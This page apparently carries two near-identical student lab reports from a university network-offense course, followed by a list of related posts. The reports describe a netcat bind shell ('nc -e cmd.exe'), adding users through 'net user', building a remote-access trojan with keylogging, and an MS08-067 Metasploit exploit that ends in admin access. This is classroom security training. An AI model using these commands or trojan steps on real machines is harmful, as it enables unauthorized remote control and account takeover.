实验四

author author     2022-09-25     121

关键词:

中国人民公安大学

Chinese people’ public security university

 

网络对抗技术

实验报告

 

实验四

恶意代码技术

 

 

 

学生姓名

 雷浩

年级

 2014

区队

 2

指导教师

 高见老师

 

 

信息技术与网络安全学院

2016117

 

实验任务总纲

2016—2017 学年   学期

一、实验目的

1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。

 

2.了解并熟悉常用的网络攻击工具,木马的基本功能;

3.达到巩固课程知识和实际应用的目的。

二、实验要求

1.认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。

2.文档要求结构清晰,图文表达准确,标注规范。推理内容客观、合理、逻辑性强。

3.软件工具可使用NC、MSF等。

4.实验结束后,保留电子文档。

三、实验步骤

1.准备

提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉并准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备。

2.实验环境

描述实验所使用的硬件和软件环境(包括各种软件工具);

开机并启动软件office2003或2007、浏览器、加解密软件。

3.实验过程

1)启动系统和启动工具软件环境。

2)用软件工具实现实验内容。

4.实验报告

按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中,文档按照规定的书写格式书写,表格要有表说图形要有图说。

 

任务一 利用NC控制电脑

 

 NetCat,具有网络军刀之称,它小巧精悍且功能强大,说它小巧精悍,是因为他的软件大小现在已经压缩到只有十几KB,而且在功能上丝毫不减。

 

实验过程需要两个同学相互配合完成:

 

步骤一:

 

   在受害者的机器 (同学A)
输入下面的命令:
  nc.exe -l -p port -e cmd.exe   进入监听模式

 技术分享

 


步骤二:
  在攻击者的机器.(同学B)
输入下面的命令:
  nc ip  port //连接victim_IP,然后得到一个shell。 (需要截图)

 技术分享

 

 

 

步骤三:

 

    在shell中,利用net user 用户名 密码 /add ,添加一个用户,并在受害者的机器中使用 net user 命令进行验证。(需要截图)

 

 技术分享

 技术分享

 

 可以继续通过命令行做一些事情。

 

任务二 利用木马控制电脑

 

实验过程需要两个同学配合:

 

步骤一:

 

    攻击者的机器. (同学A)
打开V2014.exe程序或则star RAT,这两个木马功能类似。

 技术分享

 

 


步骤二:
  点击菜单栏中的“服务生成”,在弹出的配置服务端中,配置回IP地址(攻击者IP)和端口号,并点击“生成”按钮,生成木马服务端。

 技术分享

 

 

 

步骤三:

 

将生成的木马可执行程序拷贝到受害者的机器,并双击运行。 

 

步骤四:

 

在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。 

 

1、控制主机

技术分享

 2、获取桌面

技术分享

3、拷贝文件

技术分享

4、键盘记录

技术分享

6、重启电脑

技术分享

 

中国人民公安大学

Chinese people public security university

 

网络对抗技术

实验报告

 

实验四

恶意代码技术

 

 

 

学生姓名

韩磊

年级

 2014级

区队

 二区队

指导教师

 高见

 

 

信息技术与网络安全学院

2016117

 

实验任务总纲

2016—2017 学年 第  学期

一、实验目的

1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。

 

2.了解并熟悉常用的网络攻击工具,木马的基本功能;

3.达到巩固课程知识和实际应用的目的。

二、实验要求

1.认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。

2.文档要求结构清晰,图文表达准确,标注规范。推理内容客观、合理、逻辑性强。

3.软件工具可使用NC、MSF等。

4.实验结束后,保留电子文档。

、实验步骤

1.准备

提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉并准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备。

2.实验环境

描述实验所使用的硬件和软件环境(包括各种软件工具);

开机并启动软件office2003或2007、浏览器、加解密软件。

3.实验过程

1)启动系统和启动工具软件环境。

2)用软件工具实现实验内容。

4.实验报告

按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中,文档按照规定的书写格式书写,表格要有表说图形要有图说。

 

任务一 利用NC控制电脑

 

 NetCat,具有网络军刀之称,它小巧精悍且功能强大,说它小巧精悍,是因为他的软件大小现在已经压缩到只有十几KB,而且在功能上丝毫不减。

 

实验过程需要两个同学相互配合完成:

 

步骤一:

 

   在受害者的机器 (同学A)
输入下面的命令:
  nc.exe -l -p port -e cmd.exe   进入监听模式

技术分享

 

步骤二:
  在攻击者的机器.(同学B)
输入下面的命令:
  nc ip  port //连接victim_IP,然后得到一个shell。 (需要截图)

 技术分享

 

 

步骤三:

 

    在shell中,利用net user 用户名 密码 /add ,添加一个用户,并在受害者的机器中使用 net user命令进行验证。(需要截图)

 技术分享

 

 

 

 技术分享

 

 

 可以继续通过命令行做一些事情。

 

任务二 利用木马控制电脑

 

实验过程需要两个同学配合:

 

步骤一:

 

    攻击者的机器. (同学A)
打开V2014.exe程序或则star RAT,这两个木马功能类似。

 

技术分享

 


步骤二:
  点击菜单栏中的“服务生成”,在弹出的配置服务端中,配置回连IP地址(攻击者IP)和端口号,并点击“生成”按钮,生成木马服务端。

 技术分享

 

 

 

步骤三:

 

将生成的木马可执行程序拷贝到受害者的机器,并双击运行。 

 技术分享

 

步骤四:

 

在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。 

 

  1. 文件管理,尝试拷贝文件技术分享

     

  2. 屏幕控制,尝试获取桌面技术分享

     

  3. 键盘记录,尝试获取对方击键记录技术分享

     

  4. 会话管理,重启对方机器,查看是否能自启动上线技术分享

     

 

会话管理,卸载对方的木马。

 

任务三 通过漏洞获取shell(合天平台中做) 所有过程截图写博客

 windows ms08067 漏洞利用

在平台中获取shell之后,继续利用攻击机器使用

net user user pass /add

net localgroup administrators /add

命令向被攻击的机器中添加账户,并提升为管理员

然后用rdesktop 10.1.1.130 登陆对方的远程桌面

关闭xp系统主机的防火墙

技术分享

查看攻击主机的ip地址和账户

技术分享

  启动Armitage

技术分享

 

检索10.1.1.0/24网段

技术分享

 

对130进行检测

技术分享

搜寻到适应的攻击模块

技术分享

 

 配置攻击信息

技术分享

 

利用Metasploit shall获得xp主机的管理员权限

技术分享

 

利用cmd shall建立attacker的账户

技术分享

 

利用rdesktop远程登录xp系统的attacker(密码:123465)

技术分享


















汇编实验四

 (1)实验1:    (2)实验2: 源代码:验证: (3)实验三: d命令:   查看详情

实验四

...学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验四恶意代码技术   学生姓名干哲成年级 2014级区队四指导教师高见   信息技术与网络安全学院2016年11月7日 实验任务总纲2016... 查看详情

实验四

实验内容:1.编写代码,编译,连接,运行 将字数据0403h修改为0441H2.综合使用loop,【BX】3.教材实验4(3)(P121)代码写入总结与体会:这次实验有些不太懂,恍恍惚惚,需要进一步理解。 查看详情

#2018-2019-220175304实验四《android程序设计》实验报告

---恢复内容开始---2018-2019-220175304实验四《Android程序设计》实验报告一、实验报告封面课程:Java程序设计班级:1753班姓名:刘朝尹学号:20175304指导教师:娄嘉鹏实验日期:2019年5月17日实验时间:13:45-15:25实验序号:实验四实验... 查看详情

实验四

...学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验四恶意代码技术   学生姓名王拓 年级2015 区队三 指导教师 高见  信息技术与网络安全学院2016年11月7日 实验任务总纲... 查看详情

实验四

...学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验四恶意代码技术   学生姓名 雷浩年级 2014区队 2指导教师 高见老师  信息技术与网络安全学院2016年11月7日 实验任务... 查看详情

实验四

...学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验四恶意代码技术   学生姓名高宇东 年级 2014级区队五 指导教师高见   信息技术与网络安全学院2016年11月7日 实验任务... 查看详情

实验四

...学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验四恶意代码技术   学生姓名房斌年级 2014级区队五 指导教师高见   信息技术与网络安全学院2016年11月7日 实验任务总纲201... 查看详情

实验四

...学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验四恶意代码技术   学生姓名 潘垚宏年级 2014级区队 三区队指导教师 高见  信息技术与网络安全学院2016年11月7日 实验... 查看详情

实验四

...学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验四恶意代码技术   学生姓名 唐世诚年级 2014级区队 三区队指导教师 高见  信息技术与网络安全学院2016年11月7日 实验... 查看详情

实验四

...学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验四恶意代码技术   学生姓名   宋咏霜年级2014级区队 一区队指导教师 高见  信息技术与网络安全学院2017年10月23日 ... 查看详情

实验四

...学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验四恶意代码技术   学生姓名王禹年级 14区队一区队指导教师高见  信息技术与网络安全学院2016年11月7日实验任务总纲2016—2017 学... 查看详情

实验四

...学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验四恶意代码技术   学生姓名 齐源年级2014级区队 六区队指导教师 高见  信息技术与网络安全学院2017年10月23日 实验任务... 查看详情

实验四

...学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验四恶意代码技术   学生姓名 李文政年级 2014级区队 六区队指导教师 高见  信息技术与网络安全学院2016年11月7日 实验... 查看详情

实验四

1.2. 3.4.5.6.7.  查看详情

实验四

  实验四 四、实验结论   1.综合使用loop,[bx],编写完整汇编程序,实现向内存b800:07b8开始的连续16个字单元重复填充字数据0403H。    (1)源代码  assumecs:code  codesegment     movax,0b800h     movds,ax  ... 查看详情

实验报告四

...学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验四恶意代码技术   学生姓名郑礼邦 年级 2014区队 四指导教师 高见  信息技术与网络安全学院2016年11月7日&n 查看详情

区块链技术与应用实验报告(实验四)(代码片段)

文章目录区块链技术与应用实验报告(实验四)关于作者作者介绍一、实验目的二、实验原理简介三、实验环境四、实验步骤1.运行vanitygen.exe程序2.制作比特币地址练习区块链技术与应用实验报告(实验四)关于作者作者介绍🍊博... 查看详情